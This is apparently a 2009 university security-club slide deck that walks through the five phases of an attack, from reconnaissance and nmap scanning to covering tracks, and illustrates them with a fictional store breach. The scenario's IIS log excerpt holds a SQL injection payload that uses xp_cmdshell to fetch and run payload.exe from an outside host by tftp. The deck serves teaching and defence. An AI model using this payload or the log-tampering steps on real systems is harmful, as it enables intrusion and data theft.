1. INFORMATION ASSURANCE CLUB
2. INFORMATION ASSURANCE CLUB
Anatomy of a Hack: from 0x00 to root
Thursday, October 29st, 2009
Thursday, November 5th
7:30 PM – 202 IST
Friday, December 4th
See listserv email or http://iaclub.ist.psu.edu/ictf
for more information and to sign-up!
Deadline for sign-ups is Friday, November 6th!
Dean Feedback Session
Tuesday, November 3rd
7:00pm to 9:00pm in 110 IST
The Anatomy of the Hack
6. ESSENTIAL TERMINOLOGY
THREAT – an action or event that might
compromise security. A threat is a potential
violation of security.
VULNERABILITY – existence of a
weakness, design, or implementation error
that can lead to an unexpected and
undesirable event compromising the security
of the system.
7. ESSENTIAL TERMINOLOGY
ATTACK – an assault on the system security
that is derived from an intelligent threat. An
attack is any action that violates security.
EXPLOIT – a defined way to breach the
security of an IT system through a
8. HACKER CLASSES
Black hats – individuals with extraordinary
computing skills, resorting to malicious or
destructive activities. Also known as crackers.
White hats – individuals professing hacker
skills and using them for defensive purposes.
Also known as security analysts.
Gray Hats – individuals who work both
offensively and defensively at various times.
Suicide Hackers – individuals who aim to bring
down critical infrastructure for a “cause”
(Hactivism) and do not worry about punishment.
9. QUALITIES OF A HACKER
Should be proficient with programming and computer
Has in-depth knowledge of target platforms, such as
Windows, Unix and Linux
Has exemplary knowledge of networking and related
hardware and software
Should be familiar with vulnerability research
Should have mastery in different hacking techniques
In other words, you must be “highly technical” to launch
Should be prepared to follow a strict code of conduct
“If you know the enemy and know yourself, you need not
fear the result of a hundred battles.”
-Sun Tzu, Art of War
A hacker / security professional answers the following:
What can the intruder see on the target system? (Recon and
What can the intruder do with that information?
(Gaining and Maintaining Access)
Does anyone at the target notice the intruders’ attempts or
successes (Recon and covering tracks)
Professionals need to know what it is they are trying to
protect, against whom, and what resources it is willing
to expend in order to gain protection.
11. THE FIVE PHASES
Denial of Service
Operating system level / application level
Uploading / altering / downloading programs or data
12. PHASE 1 - RECONNAISSANCE
Reconnaissance refers to the preparatory
phase where an attacker seeks to gather as
much information as possible about a target
prior to launching an attack.
Generally noted as “rattling the door knobs”
to see if someone is watching and
Could be the future point of return, noted for
ease of entry for an attack when more about the
target is known on a broad scale.
13. RECONNAISSANCE TYPES
Passive reconnaissance involves acquiring
information without directly interacting with
Ex: Searching public records or news releases.
Active reconnaissance involves interacting
with the target directly by any means.
Ex: Telephone calls to help desk or technical
14. RECON TECHNIQUES
Job search sites (job requirements)
Google search / Google hacking
Rich information for passive recon
Footprinting is necessary to systematically
and methodically ensure that all pieces of
information are identified.
Footprinting is often the most difficult task in
the hacker methodology.
An attacker spends 90% of the time profiling
an organization and another 10% launching
• Domain Name
• Network block
• IP addresses of reachable systems
• TCP and UDP services running
• System architecture
• Intrusion Detection Systems
• System enumeration (user and group
names, system banners, routing tables,
• Analog/digital telephone numbers
• Remote system types
• Authentication mechanisms
• Network protocols used
• Internal domain names
• Network blocks
• IP addresses of reachable systems
• TCP and UDP services running
• System architecture
• Intrusion Detection Systems
• System enumeration
• Connection origination and
• Type of connection
• Access control mechanisms
Located in the root folder and holds a list of
directories and other resources that a site
owner does not want indexed.
Hackers usually look here first!
All (most) search engines comply to
19. PHASE 2 - SCANNING
Scanning refers to the pre-attack phase
when the hacker scans the network for
specific information on the basis of
information gathered during reconnaissance.
Hackers have to get a single point of entry to
launch an attack.
Scanning can include use of dialers, port
scanners, networking mapping, sweeping,
vulnerability scanners, etc.
20. PHASE 2 - SCANNING
Types of scanning:
Port scanning – a series of messages sent to a
computer to learn about services.
Network Scanning – a procedure for identifying
active hosts on a network.
Vulnerability Scanning – automated process of
proactively identifying vulnerabilities of
21. SCANNING PHASES
Check for live
Check for open
Prepare proxies ATTACK!
22. CHECKING FOR LIVE SYSTEMS
ICMP scanning – find if hosts are running by
pinging them all.
ICMP scans can be run parallel so they are
Tools: Angry IP Scanner, Ping Sweep, Firewalk
23. CHECKING FOR OPEN PORTS
Rapidly scans large networks
Port scanning, OS detection, version detection,
Scans a large number of machines at one time
Supported by many operating systems
Carry out all types of port scanning techniques
24. CHECKING FOR OPEN PORTS
Command line oriented TCP/IP packet assembler/analyzer
Has a traceroute mode
Ability to send files between a cover channel
Advanced port scanning
Network testing, using different protocols, TOS, fragmentation
Remote OS fingerprinting
Remote uptime guessing
TCP/IP stacks auditing
25. PORT SCANNING BASICS
The TCP/IP three way handshake
SYN -> SYN/ACK -> ACK
SYN – initiates request
ACK – establishes connection
PSH – send all buffered data immediately
URG – packet should be processed immediately
FIN – no more transmissions
RST – reset connection
26. COMMON PORT SCANS
TCP Connect Scan (-sT)
Response is SYN/ACK if open, RST if closed.
SYN Scan (half open scan) (-sS)
SYN -> SYN/ACK -> RST
Fewer sites log this type of scan.
Server responds with RST if port is closed.
27. COMMON PORT SCANS
Fin Scan (-sF)
Xmas Scan (-sX)
Null Scan (-sN)
Return RST if closed, no response if open.
Called stealth because they send a single frame
to a TCP port without handshake.
Windows didn’t follow RFC 793 (Transmission
Control Protocol) so it responds with a RST
frame for all queries.
28. COMMON PORT SCANS
Idle Scan (-sI)
Completely blind port scanning! Attackers can
actually scan a target without sending a single
packet to the target from their own IP address.
Every IP packet has a “fragment identification”
number, which is incremented by the stack.
Probing the number can tell an attacker how many
packets have been sent since the last probe.
Find a zombie (idle) machine. Spoof packet from
zombie, zombie gets SYN/ACK if open and sends
RST and increments IPID, gets RST if closed (no
29. BANNER GRABBING / FINGERPRINTING
Determine the operating system on the target
Active stack fingerprinting
Based on the fact that OS vendors implement the TCP
Specially crafted packets are sent to remote OS and the
response is noted and compared with a database.
This type of scan is logged.
Indirect methods; Uses sniffing techniques instead of
Also based on differential implementation of the stack.
30. SCANNING FOR VULNERABILITIES
Nessus – most common tool.
NASL (Nessus attack scripting language).
Can test unlimited hosts simultaneously.
Smart service recognition.
31. PREPARING PROXIES
Proxy is a network computer that can serve
as an intermediate for connection with other
As a firewall, a proxy protects the local network from
Acts as an IP address multiplexer, allows a connection
from a number of computers having only one IP
Anonymous web surfing (to an extent).
Specialized proxies can filter unwanted content, such
as ads or “unsuitable” material.
32. PREPARING PROXIES
A hacker wants to use a proxy to hide their
May use multiple proxies (proxy chains).
Allows users to perform various Internet tasks
despite restrictions imposed by firewalls.
This is made possible by sending data through
HTTP (port 80).
34. PHASE 3 – GAINING ACCESS
Gaining access refers to the penetration phase. The
hacker exploits the vulnerability in the system.
The exploit can occur over a LAN, the Internet, or as
a deception or theft.
Examples include buffer overflows, denial of service,
session hijacking, and password cracking.
Influencing factors include architecture and
configuration of the target system, the skill level of the
attacker, and the initial level of access obtained.
The hacker can gain access at the operating system
level, application level, or network level.
Enumeration is defined as extraction of user
names, machine names, network resources,
shares, and services.
Enumeration leads to an attack
Step 1: Enumerate users
Step 2: Crack the password
Step 3: Escalate privileges
Step 4: Execute applications
Can bypass steps depending on the nature of
36. ATTACK SOPHISTICATION
US GAO report to Congress, “Computer Attacks at Department of Defense Pose Increasing Risks”, May 1996.
37. ATTACK SOPHISTICATION
CERT - “Information Security as an Institutional Priority” - 2005
38. HOW TO GAIN ACCESS
There are several ways an attacker can gain
access to a system.
The attacker must be able to exploit a
weakness or vulnerability in a system.
39. OPERATING SYSTEM ATTACKS
Today’s operating systems are complex in nature.
Operating systems run many services, ports, and
modes of access and require extensive tweaking to
lock them down.
The default installation of most operating systems
has large numbers of services running and ports
Applying patches and hotfixes are not easy in today’s
Attackers look for OS vulnerabilities and exploit them
to gain access to a network system.
40. APPLICATION LEVEL ATTACKS
Software developers are under tight schedules to deliver products
Extreme Programming is on the rise in software engineering
Software applications come with tons of functionalities and
Sufficient time is not there to perform complete testing before
Security is often an afterthought and usually delivered as an “add-
Poor or non-existent error checking in applications leads to buffer
41. SHRINK WRAP CODE ATTACKS
Why reinvent the wheel when you can buy off-
the-shelf libraries and code?
When you install an OS or application, it comes
with tons of sample scripts to make the life of an
The problem is “not fine tuning” or customizing
This will lead to default code or shrink wrap
42. MISCONFIGURATION ATTACKS
Systems that should be fairly secure are hacked
because they were not configured correctly.
Systems are complex and the administrator does not
have the necessary skills or resources to fix the
Administrator will create a simple configuration that
In order to maximize your chances of configuring a
machine correctly, remove any unneeded services or
43. IMPORTANT RULE
If a hacker wants to get inside your system,
they will and there is nothing you can do
The only thing you can do is make it harder
for them to get in.
“If you approach a bear with a friend, you
don’t have to outrun the bear… just your
44. PHASE 4 – MAINTAINING ACCESS
Maintaining access refers to the phase where
the hacker tries to retain ownership of the
The hacker has compromised the system.
Hackers may harden the system from other
hackers as well (to own the system) by securing
their exclusive access with backdoors, rootkits,
Hackers can upload, download, or manipulate
data, applications, and configurations on the
45. PHASE 5 – COVERING TRACKS
Covering tracks refers to the activities that
the hacker does to hide their actions.
Reasons include the need for prolonged stay,
continued use of resources, removing
evidence of hacking, or avoid legal action.
Examples include steganography, tunneling,
and altering log files.
46. LOG FILES
Failed logins, accessing files without privileges
Driver failure, things not operating correctly
UTMP (information about current users)
WTMP (logins and logouts)
LASTLOG (last login)
47. APPLICATION (INTERACTIVE)
Think like a hacker! Use your background
knowledge to figure out how the hacker
compromised this fictional company.
Scenario: An online store had their database
compromised and customer’s credit card
data stolen. The hacker knew nothing initially
but the name of the target company.
48. PHASE 1 - RECONNAISSANCE
What can the hacker learn about the target?
Where should they look for information?
49. PHASE 1 - RECONNAISSANCE
Hacker learns as much as they can about the
company from online resources.
Resolves IP address of the domain name.
WHOIS information is private, no action taken.
Finds job posting for a Windows Administrator
with familiarity operating IIS and MSSQL.
50. PHASE 2 - SCANNING
What should the hacker scan?
What are some tools they could use?
51. PHASE 2 - SCANNING
The hacker uses nmap to map the network.
Finds only the webserver and a few other hosts in
the DMZ. Firewall blocks remote access to internal
Hacker fingerprints the webserver.
Running IIS 7.0 and ASP.
Locked down; ports closed and no extra services
Scans for vulnerabilities.
Systems are patched.
52. NETWORK DIAGRAM
53. PHASE 3 - GAINING ACCESS
What might the hacker do now?
What type of attack could they launch?
54. PHASE 3 - GAINING ACCESS
The hacker finds a SQL injection vulnerability in a web
This is confirmed by looking at the IIS logs:
2009-10-29 05:50:25 W3SVR1 10.0.5.13 GET
/members/profile.asp action=show&id=16705946’ -- 80 -
126.96.36.199 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.1;+en-
US;+rv:188.8.131.52)+Gecko/20071127+Firefox/184.108.40.206 500 0 0
2009-10-29 05:55:13 W3SVR1 10.0.5.13 GET
;exec master..xp_cmdshell 'echo tftp ^&^& echo open 220.127.116.11
^&^& echo user h@ck3r ^&^& echo uber1337 ^&^& echo get payload.exe
^&^& echo quit%3Eexecute.bat'-- |331|80130e62|
Incorrect_syntax_near_the_keyword_'ORDER BY' 80 - 18.104.22.168
56. PHASE 3 - GAINING ACCESS
The hacker has been able to transfer
binaries to the web server and execute
The hacker cannot connect directly to the
database server as it is configured to only
allow connections from the internal network
and the webserver, but once the webserver
is compromised the hacker can use it to
extract database information.
57. PHASE 4 - MAINTAINING ACCESS
How can the hacker maintain access to the
58. PHASE 4 - MAINTAINING ACCESS
The hacker can maintain access by installing
rootkits or backdoors.
The hacker may also harden the system to
prevent SQL injection attacks similar to the
ones they used.
59. PHASE 5 - COVERING TRACKS
The hacker erased firewall and IDS logs as
well as the audit logs on the system, but they
forgot to edit the IIS connection logs.
What are the consequences of this action,
from both the hacker’s and the system
Hacking is an art, not a science.
Hackers need only a single point of entry.
You’re only as strong as your weakest link.
Where there’s a will, there’s a way.
Never underestimate a Hacker’s determination.
Security should never be an afterthought.